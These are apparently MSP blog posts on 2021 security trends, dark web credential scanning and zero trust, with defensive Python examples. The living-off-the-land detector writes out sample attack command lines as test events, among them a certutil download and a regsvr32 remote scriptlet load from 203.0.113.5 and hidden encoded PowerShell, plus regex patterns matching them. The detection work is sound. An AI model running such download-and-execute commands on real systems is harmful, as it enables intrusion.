2021 Year End Security Review


2021 has been an incredibly difficult year for protecting your organization from cyber adversaries. It has been called “the year of the zero-day exploit,” with more zero-day vulnerabilities exploited in the first 11 months of the year than in any previously recorded year. As we head into the end of the year and the holiday season, Black Diamond Solutions wanted to share a few insights from a full year of zero-day events.

  • A tough year to manage IT – Whether you have an internal IT team, use an MSP, or a combination of both, relying on patches alone is not enough. In particular, when no patch is available, it is paramount that your security stack and team are ready to monitor for, detect, and respond immediately to the earliest signs of a threat.
  • Actions speak louder than… – Amid the attacks of 2021, the security providers that focused on rapid response and action led the charge against zero-day vulnerabilities. True security is more than detection and alerts: it is about containing and eliminating the threat so that IT teams and businesses can stay focused on their business.
  • Long dwell times are a thing of the past – If not addressed immediately, intrusions that begin with info-stealers quickly spiral out of control. Once an adversary gains initial access, their main objective is to extend their reach and spread their malware to inflict as much cost on the victim as possible. Gone are the days of long dwell times; after a breach, malicious actions now occur within minutes.
  • Living off the land – Adversaries are increasingly using legitimate credentials to enter your environment. Then, without dropping malware at all, they ‘live off the land’: they use only the native programs and administrative tools already present in the compromised environment (scripting hosts, remote management utilities, built-in download and certificate tools) to blend in with normal activity before finally deploying their payload. Because nothing unknown or unsigned is written to disk, detection is extremely difficult for legacy tools such as anti-virus and anti-malware that rely on recognizing malicious files; catching this activity means watching how legitimate tools are used, by whom, and from which parent process.
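To make the living-off-the-land point concrete, here is a small detection pass over constructed process-creation events (in the shape of Sysmon Event ID 1 or EDR process-start records). It is an added example for this review, not Black Diamond Solutions' detection content; the events, the rule set and the account CORP\jdoe are assumptions. Every process it flags is a signed Windows binary run under a valid account, so the rules key on command-line arguments and the parent process rather than on the file itself.

```python
"""Flag 'living off the land' activity in process-creation telemetry.

Constructed illustration: the events and the rule set below are
assumptions for this example, not a vendor's detection content.
The events mimic Sysmon Event ID 1 / EDR process-start fields."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    eid: int          # event id, used to report hits
    user: str         # account the process ran as (often a legitimate one)
    parent: str       # parent process image path
    image: str        # process image path
    cmdline: str      # full command line


def base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PROXY_EXEC = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# All of these binaries are signed Microsoft tools, so a file-based scanner
# sees nothing wrong. The signal is how they are invoked and by whom.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("certutil_fetch_or_decode",
     lambda e: base(e.image) == "certutil.exe"
     and re.search(r"-urlcache|-decode", e.cmdline, re.I) is not None),
    ("powershell_encoded_or_hidden",
     lambda e: base(e.image) == "powershell.exe"
     and re.search(r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|downloadstring",
                   e.cmdline, re.I) is not None),
    ("proxy_exec_remote_content",
     lambda e: base(e.image) in PROXY_EXEC
     and re.search(r"https?://|javascript:|scrobj\.dll", e.cmdline, re.I) is not None),
    ("office_spawns_shell",
     lambda e: base(e.parent) in OFFICE and base(e.image) in SHELLS),
    ("wmic_remote_process_create",
     lambda e: base(e.image) == "wmic.exe"
     and re.search(r"/node:\S+\s+process\s+call\s+create", e.cmdline, re.I) is not None),
]


def detect(events) -> List[Tuple[int, str]]:
    """Return (event id, rule name) for every rule an event trips."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((e.eid, name))
    return hits


# Constructed events: every one runs as the same legitimate domain user.
U = "CORP\\jdoe"
EVENTS = [
    ProcEvent(1, U, r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\Temp\build.zip SHA256"),
    ProcEvent(2, U, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt"),
    ProcEvent(3, U, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcEvent(4, U, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(5, U, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\wmic.exe",
              r'wmic.exe /node:FILESRV01 process call create "cmd /c whoami > C:\t.txt"'),
    ProcEvent(6, U, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"),
    ProcEvent(7, U, r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"),
]

if __name__ == "__main__":
    for eid, rule in detect(EVENTS):
        ev = EVENTS[eid - 1]
        print(f"event {eid}: {rule}: {ev.user} {base(ev.parent)} -> {ev.cmdline}")
```

Events 1, 4 and 6 are ordinary administration (hashing a file, running a scheduled script, a system rundll32 call) and trip nothing; events 2, 3, 5 and 7 are the same binaries with download, encoded, remote-execution or Office-spawned arguments. The rules are deliberately narrow; in production they would be tuned against the environment's own baseline of administrative activity.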

 Despite the challenges, Black Diamond Solutions appreciates your business in 2021, and we look forward to continuing to help you, our clients, build and protect your IT environment in 2022.

Our security operations center continues to provide diligent 24x7x365 managed detection and response to our security clients. We remain agile and vigilant, moving faster than the bad actors to keep your environment safe.

Want to start out 2022 with a little more peace of mind regarding the security of your environment? 

Sign up for a FREE DEMO of our SOC capabilities!  

Dark Web Scanning: Security Blankets


What is the “Dark Web”?

You have probably heard that dark web scanning is a great way to help prevent a data breach. But what does that actually mean? The dark web is a part of the World Wide Web that runs on darknets (overlay networks) and is only reachable through specific software such as the Tor Browser. Unlike the surface web, it is not indexed by search engines like Google and Bing. On the dark web, individuals can trade on marketplaces and communicate anonymously without giving up identifying information such as their location.

A dark web marketplace serves as a digital black market, letting criminals buy leaked data and personal information with little risk of being traced. Credit card details, medical records, passwords and other sensitive information are sold and distributed there, and relatively inexpensively. Worse, the same information can be resold over and over to many buyers, giving multiple potential attackers access to the same user accounts and other stolen data.

The loss of employee or company data can be devastating to an organization for multiple reasons. The cost of recovering from it can be extraordinary, as can the reputational damage if you are legally or morally obliged to tell your clients and vendors that you have experienced a breach.

This is why some organizations choose to run ongoing dark web scans for the domains they own. Now, you might ask, “What exactly is dark web scanning?” Dark web scans are performed by dark web scanners: tools that collect and index leaked data from dark web marketplaces, forums, paste sites and breach dumps, then search it for full or partial matches against your company’s domains and IP addresses. The items normally found are business usernames, business passwords, personal passwords reused on work accounts, and other business and personal information. Knowing what company data is circulating on the dark web lets your IT team or provider make the needed changes, both technical (resetting the exposed passwords and enforcing multi-factor authentication on the affected accounts) and in company security policy (for example, not allowing personal email addresses to be used for company business).
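As an added example of the matching step a dark web scan performs (not software from Black Diamond Solutions or any vendor), the Python below runs a constructed leak feed against a set of monitored domains. The domains example.com and example-corp.com, the feed records and the source names are invented for the illustration. It normalises addresses, includes subdomains but excludes look-alike domains, keeps only a short hash of each password in the report, and orders the findings so that plaintext passwords seen in several dumps (the “sold over and over again” case) come first.

```python
"""Match a collected leak feed against the domains an organization owns.

Constructed illustration: the monitored domains and the feed records are
invented for this example; a real scanner would fill LEAK_FEED from the
marketplaces, forums, paste sites and breach dumps it has collected."""
import hashlib
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

MONITORED_DOMAINS = {"example.com", "example-corp.com"}   # assumption

# (email as found, password or hash as found, source, date first seen)
LEAK_FEED = [
    ("j.doe@example.com",      "Summer2021!",  "forum-dump-a", "2021-03-04"),
    ("j.doe@example.com",      "Summer2021!",  "combolist-7",  "2021-09-11"),
    ("r.roe@EXAMPLE.com",      "$2b$12$c0nstructedBcryptHashNotRealXXXXXXXXXXXXXXXXXXXXXXX",
                                               "forum-dump-a", "2021-03-04"),
    ("someone@gmail.com",      "hunter2",      "combolist-7",  "2021-09-11"),
    ("admin@mail.example.com", "Winter2021!",  "paste-0x1f",   "2021-12-01"),
    ("x@notexample.com",       "password",     "combolist-7",  "2021-09-11"),
]


def email_domain(email: str) -> str:
    return email.rsplit("@", 1)[-1].lower()


def in_scope(domain: str, monitored: Iterable[str]) -> bool:
    """True for a monitored domain or any subdomain of it; look-alikes
    such as notexample.com must not match."""
    return any(domain == m or domain.endswith("." + m) for m in monitored)


def fingerprint(secret: str) -> str:
    """Short hash so the report can say 'same password seen in two dumps'
    without carrying the plaintext around."""
    return hashlib.sha256(secret.encode()).hexdigest()[:12]


def scan(feed, monitored) -> Dict[str, dict]:
    """Return {email: {sources, fingerprints, plaintext}} for in-scope accounts."""
    found = defaultdict(lambda: {"sources": set(), "fingerprints": set(), "plaintext": False})
    for email, secret, source, _seen in feed:
        email = email.lower()
        if not in_scope(email_domain(email), monitored):
            continue
        rec = found[email]
        rec["sources"].add(source)
        rec["fingerprints"].add(fingerprint(secret))
        # Modular-crypt hashes ($2b$, $argon2id$, ...) are already hashed;
        # anything else is treated as a plaintext password.
        if not secret.startswith("$"):
            rec["plaintext"] = True
    return dict(found)


def triage(report) -> List[Tuple[str, str]]:
    """Order accounts by urgency: plaintext exposures first, then by how
    many separate sources carry them (resold data means more buyers)."""
    def key(item):
        email, rec = item
        return (not rec["plaintext"], -len(rec["sources"]), email)
    out = []
    for email, rec in sorted(report.items(), key=key):
        if rec["plaintext"]:
            action = "force password reset, require MFA, check for reuse on other systems"
        else:
            action = "confirm source breach and date; reset if the hash is weak or old"
        out.append((email, action))
    return out


if __name__ == "__main__":
    report = scan(LEAK_FEED, MONITORED_DOMAINS)
    for email, action in triage(report):
        rec = report[email]
        print(f"{email}: {len(rec['sources'])} source(s), "
              f"{len(rec['fingerprints'])} distinct secret(s), "
              f"plaintext={rec['plaintext']} -> {action}")
```

The gmail.com and notexample.com rows are dropped as out of scope, the upper-case address is folded to the same account, and the report never contains the recovered password itself, only a fingerprint good enough to tell a repeat of the same password from a new one.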

Why is dark web scanning important?

Human error is one of the leading causes of data breaches, so it is important to have layers of security protecting your company. A dark web scan can help you find and fix the consequences of human error (a reused password, a work account registered on a breached third-party site) before they become a problem. Additionally, cybercriminals are always looking for new ways to steal information, and if no one is watching the dark web for your data, they have the upper hand. Dark web monitoring not only tracks your company’s exposed data but also gives you the chance to act before it is used against you.

Dark Web Scan Proactive Monitoring

Having a dark web monitoring service on a regular basis is a smart idea for the following reasons:

  • With so much now dependent on a digital world, it is a very good idea to have your company domains proactively monitored and reported on. There are simply too many credentials in circulation, and even a small percentage of stolen data can cost a company immensely.
  • By actively monitoring the dark web for data tied to your domains and company, your IT team or provider can, over time, significantly lower the amount and types of data being leaked. This can be done through end-user training as well as network and policy settings that restrict the kinds of end-user activity that result in data dumps.

Comprehensive Reporting

In addition to running a dark web scan and learning which credentials are on the dark web, a comprehensive dashboard report is a great feature of most dark web monitoring services. These reports show management which data is circulating on the dark web, along with insights into how the breaches occurred, allowing the IT team to react and set up additional security policies and procedures based on real data. (See the example report page below.)

Dark Web Scans | Final Considerations

It is easy to see the benefits of dark web scanning for any organization. It is easier to fight an adversary when you already have the upper hand than to hope you can win it back after an account takeover occurs. A trusted team of cyber security professionals can help you gain that upper hand and keep it with proactive dark web monitoring. By gathering information about your data circulating on the dark web and analyzing comprehensive reports with insights, your IT team is better equipped to prevent a future data breach. If you are concerned about this issue in your organization or want more information on dark web scanning, contact us today! We offer several security services designed to keep your information from leaking onto the dark web, so feel free to reach out with questions anytime!

Cybersecurity During the Roaring 20s: Real-world advice and expectations

I’ll spare you half a blog showcasing scary statistics around ransomware and cybersecurity. If you’re reading this, you’re well aware that data is valuable, and ransomware is a means of monetizing attacks against data. To put this into some perspective: as of late 2020, one in four attacks that IBM Security X-Force Incident Response had remediated that year was caused by ransomware. According to a recent post, ransomware incidents appeared to explode in June 2020; that month saw one-third of all the ransomware attacks IBM Security X-Force had remediated so far that year.

I’m sure you are aware of some of the more recent attacks against businesses, local communities, and even federal governments.

That said, this is honestly the perfect time to take a reflective look at your cybersecurity strategy. As someone who studies, researches, and works with different security strategies, I have seen a shift in how organizations, large and small, are designing their security standards for the new decade. Here is some of the feedback they have shared and some strategies that can help.

  1. Zero trust should become your new standard. Zero trust isn’t a piece of technology or a single solution. Instead, it’s an entire approach and philosophy to securing data and devices both inside and outside your network. Zero trust is a security concept developed in 2010 which holds that an organization must contextually verify anything and everything trying to connect to its systems before granting any access. The core belief is that organizations should not automatically trust anything inside or outside their perimeters: being on the corporate network, or holding a valid password, is not by itself proof of legitimacy. This is an excellent time to review your security measures to ensure you don’t have blanket policies granting access to vast amounts of data or devices.
  2. Anyone and anything can be a target. Living in a digital age means that much more than your computer becomes a target. Everything from biometric data, IoT devices, and connected systems to physical devices can be targeted. A contextual approach to security means understanding everything within your IT environment, which is a big reason why solutions like IT Asset Management (ITAM) are so critical. Modern ITAM solutions look far beyond physical devices. Be sure to know what’s on your network, where your data resides, and who has access, because you cannot verify a device or user you do not know exists.
  3. Attacks can come without any notification or payloads. An attack could be a scan, or an attempt to sit on your network for a while and listen. The goal of the intruder isn’t always to steal something, at least not initially. Leveraging smarter systems that can isolate anomalous traffic can help.

    Furthermore, it’s essential to think about anything that can take down a network, including DDoS attacks, phishing, and other threats. Remember, the sophistication of the modern attacker goes way beyond data exfiltration, and the motivation behind a threat could be monetary, data-driven, or even political.

  4. Don’t be complacent; try new security solutions. Layered security approaches are critical to creating a sound security environment. Let me give you a real-world example. An attacker who is motivated to get into your company will go to great lengths to find weaknesses. So, let’s assume you have a critical application in your environment. You keep this application up to date and locked down. But this application runs as a virtual app on a virtualization layer. What happens if you miss an update on your hypervisor? Suddenly the guest tools, paravirtualization interfaces, or other hypervisor subsystems become a realistic path to the application, however well the application itself is patched. Diving even deeper, are you patching the hosts on which your virtualization platform is running? If not, that’s yet another threat vector. Remember, an attack can be layers deep, and every layer needs its own controls. Newer approaches such as zero trust are one way to redesign security with that in mind.
  5. Partner with organizations that have deep security capabilities. Deeper security capabilities could include researching the dark web for any of your credentials or intellectual property, or undergoing vulnerability assessment or penetration testing against your environment. Traditional security technologies will only take you so far. Partners with more in-depth security tools can help deploy the right architecture based on your use case, data, and users, and a trusted second set of eyes improves your security posture.
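As an added example, not code from the original post, the following Python puts items 1 and 2 side by side: a perimeter-style decision that trusts any internal address, and a zero-trust decision that checks the device against an asset inventory and requires MFA for sensitive resources on every request, wherever it comes from. The network ranges, the device ids LT-0412 and LT-0777, the resource table and the four requests are constructed assumptions.

```python
"""Perimeter trust versus zero trust on the same access requests.

Constructed illustration: the network ranges, device inventory, resource
sensitivity table and requests are assumptions made for this example."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple

INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Asset inventory (the ITAM data of item 2): device id -> posture
DEVICES = {
    "LT-0412": {"managed": True, "patched": True},
    "LT-0777": {"managed": True, "patched": False},
}

# Sensitivity drives how much verification a request has to carry
RESOURCES = {"wiki": "low", "payroll": "high", "hr-db": "high"}


@dataclass
class Request:
    name: str
    user: str
    src_ip: str
    device_id: Optional[str]   # None when no enrolled device identity was presented
    mfa: bool                  # whether this session completed MFA
    resource: str


def perimeter_decision(req: Request) -> bool:
    """Legacy model: inside the network means trusted, outside means blocked."""
    return any(ip_address(req.src_ip) in net for net in INTERNAL_NETS)


def zero_trust_decision(req: Request) -> Tuple[bool, List[str]]:
    """Verify device and resource context on every request; the source
    network never grants trust by itself. Returns (allowed, reasons)."""
    reasons = []
    dev = DEVICES.get(req.device_id)
    if dev is None or not dev["managed"]:
        reasons.append("unknown or unmanaged device")
    elif not dev["patched"]:
        reasons.append("device out of compliance (unpatched)")
    sens = RESOURCES.get(req.resource)
    if sens is None:
        reasons.append("unknown resource")
    elif sens == "high" and not req.mfa:
        reasons.append("MFA required for high-sensitivity resource")
    return (not reasons, reasons)


# Constructed requests, all with the same valid username and password.
REQUESTS = [
    Request("office-wiki", "jdoe", "10.1.2.3", "LT-0412", False, "wiki"),
    Request("stolen-creds-inside", "jdoe", "10.1.2.3", None, False, "payroll"),
    Request("remote-worker", "jdoe", "203.0.113.9", "LT-0412", True, "payroll"),
    Request("unpatched-inside", "jdoe", "10.1.2.3", "LT-0777", True, "hr-db"),
]


def compare(requests) -> List[Tuple[str, bool, bool]]:
    """(request name, perimeter allows?, zero trust allows?)"""
    return [(r.name, perimeter_decision(r), zero_trust_decision(r)[0]) for r in requests]


if __name__ == "__main__":
    for r in REQUESTS:
        ok, why = zero_trust_decision(r)
        print(f"{r.name:22} perimeter={perimeter_decision(r)!s:5} "
              f"zero_trust={ok!s:5} {'; '.join(why)}")
```

The second request is the living-off-the-land case from the year-end review: a valid credential used from an internal address with no enrolled device. The perimeter model lets it straight through to payroll; the zero-trust model denies it for two independent reasons. Conversely, the remote worker on a managed, patched laptop with MFA is allowed, which the perimeter model would have blocked.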

Over these past few short years, our world dove headfirst into the digital realm. Throughout 2020, we quickly saw just how critical digital infrastructure could be. We also saw some of the largest DDoS attacks and some of the most ferocious ransomware infiltrations. Most of all, we noticed that anyone could be a target. Lone attackers, criminal groups, and even nation-states are highly motivated to go after your data.

If you’ve been ‘doing the same thing’ for the past couple of years with only minor upgrades, you need to rethink this strategy. For example, do you have automated patching in place? How locked down are your remote users? How well do you know the location of all of your IT or connected assets? Any lapse here would leave you open to attack.

Another critical point revolves around modernization. Just because a piece of equipment still works doesn’t mean it’s bringing you value. Worse yet, it could create a lapse in security. Many organizations don’t want to upgrade that server or refactor that application because of the cost and the undertaking. They also don’t realize just how much worse it will be if those systems are breached.

No one wants to wake up on a Monday morning to find that they’ve been the victim of a data breach or ransomware attack. Take this opportunity to have a ‘roaring’ security plan as you enter the roaring 20s.